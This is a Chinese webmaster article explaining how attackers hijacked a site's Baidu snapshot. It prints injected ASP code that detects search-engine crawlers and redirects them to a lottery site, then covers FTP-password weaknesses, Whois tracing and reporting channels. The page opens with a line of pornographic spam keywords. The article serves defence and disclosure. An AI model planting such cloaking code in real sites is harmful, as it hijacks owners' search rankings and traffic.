欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

黑客是怎么篡改百度快照的?

  發(fā)布時(shí)間:2014-11-24 17:07:10   作者:佚名   我要評(píng)論
我的客戶電話說自己的百度排名沒有了,查詢下竟然百度標(biāo)簽顯示的內(nèi)容是一家彩票平臺(tái)的網(wǎng)站內(nèi)容。 我知道網(wǎng)站被黑客加入了非法代碼,惡意篡改了百度快照。需要的朋友可以參考下

  寫本篇文章的目的在于揭露一種黑客作弊的手段,也給那些疏于企業(yè)網(wǎng)站安全的站長(zhǎng)提一個(gè)醒。同時(shí)提供一種追找黑客行蹤的簡(jiǎn)單方法。

  前幾日,我的客戶電話說自己的百度排名沒有了,查詢下竟然百度標(biāo)簽顯示的內(nèi)容是一家彩票平臺(tái)的網(wǎng)站內(nèi)容。 我知道網(wǎng)站被黑客加入了非法代碼,惡意篡改了百度快照。(截圖如下)

  查看“百度快照”出現(xiàn)的是一組跳轉(zhuǎn)網(wǎng)站的廣告內(nèi)容。我們對(duì)客戶設(shè)置的網(wǎng)站信息消失了。

 

  1、黑客是如何修改百度快照的呢?

  我進(jìn)行了排查,客戶的網(wǎng)站是使用asp源碼開發(fā)的。發(fā)現(xiàn)有個(gè)文件被黑客寫入了一段代碼。

  路徑:Inc文件夾—SysProduct.asp文件里面最底下添加了如下代碼:

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"(跳轉(zhuǎn)的網(wǎng)站,引導(dǎo)百度抓取的內(nèi)容)

else

'

Response.Write""

end if

%>

  黑客設(shè)置的這串代碼導(dǎo)致百度爬蟲抓取網(wǎng)頁的時(shí)候,直接抓取越過客戶網(wǎng)站抓取了跳轉(zhuǎn)網(wǎng)站內(nèi)容,導(dǎo)致百度快照里面顯示的是別的內(nèi)容。使得客戶本來排名首頁的網(wǎng)站直接被百度屏蔽了。造成了客戶很大的損失。

  2、那么黑客是如何進(jìn)入后臺(tái)的呢?

  黑客要進(jìn)入后臺(tái),必須知道FTP賬戶和密碼,以及IP地址。

  造成的原因有如下幾種:

  1)一方面是FTP密碼設(shè)置的時(shí)候比較簡(jiǎn)單化,很容易被利用軟件破解掉,

  2)另一方面選擇便宜的空間也是一種隱患。因?yàn)榭臻gIP以及用戶名是很難被知道的,除非有人提供。

  3、網(wǎng)站被黑之后,你如何追查黑客的來源?

  方法比較簡(jiǎn)單,就是查詢你跳轉(zhuǎn)的目標(biāo)網(wǎng)站的域名信息。一般情況下,都是一些小型的站長(zhǎng)開發(fā)的賺錢網(wǎng)站,通過查詢域名信息你可以獲知該域名的歸屬人是誰,他有可能就是黑你網(wǎng)站的人。

  如果是比較大型的網(wǎng)站利用外包的方式進(jìn)行推廣,那么你也可以得知負(fù)責(zé)人,給百度或者是網(wǎng)絡(luò)警察舉報(bào)一下,該網(wǎng)站存在惡意攻擊修改內(nèi)容的行為,畢竟它也有一定得責(zé)任。

  通過中國(guó)萬網(wǎng)Whois域名查詢:比如我客戶跳轉(zhuǎn)的彩票網(wǎng)站的域名信息如下:

  1)第一個(gè)是:注冊(cè)人

  2)第二個(gè)是:聯(lián)系電話

  3)第三個(gè)是:聯(lián)系郵箱

  基本上你聯(lián)系注冊(cè)人就可以解決問題。如果對(duì)你客戶造成的損失太大的話,建議你通過以下方式進(jìn)行維權(quán):

  違法和不良信息舉報(bào)中心:http://net.china.cn/

  12321網(wǎng)絡(luò)不良與垃圾信息舉報(bào)受理中心:http://www.12321.cn/

  國(guó)家互聯(lián)網(wǎng)應(yīng)急中心網(wǎng)絡(luò)安全舉報(bào)中心:http://www.cert.org.cn/

  中國(guó)反釣魚網(wǎng)站聯(lián)盟認(rèn)定及處理流程: http://www.cnnic.cn/

  公安部信息網(wǎng)絡(luò)安全報(bào)警網(wǎng)站:http:// http://www.cnnic.cn/

  中國(guó)掃黃打非網(wǎng):http://www.shdf.gov.cn/

  北京市公安局網(wǎng)絡(luò)違法犯罪舉報(bào)網(wǎng)站:http://www.bj.cyberpolice.cn/index.jsp

  希望本篇文章對(duì)你防黑有幫助。

相關(guān)文章

最新評(píng)論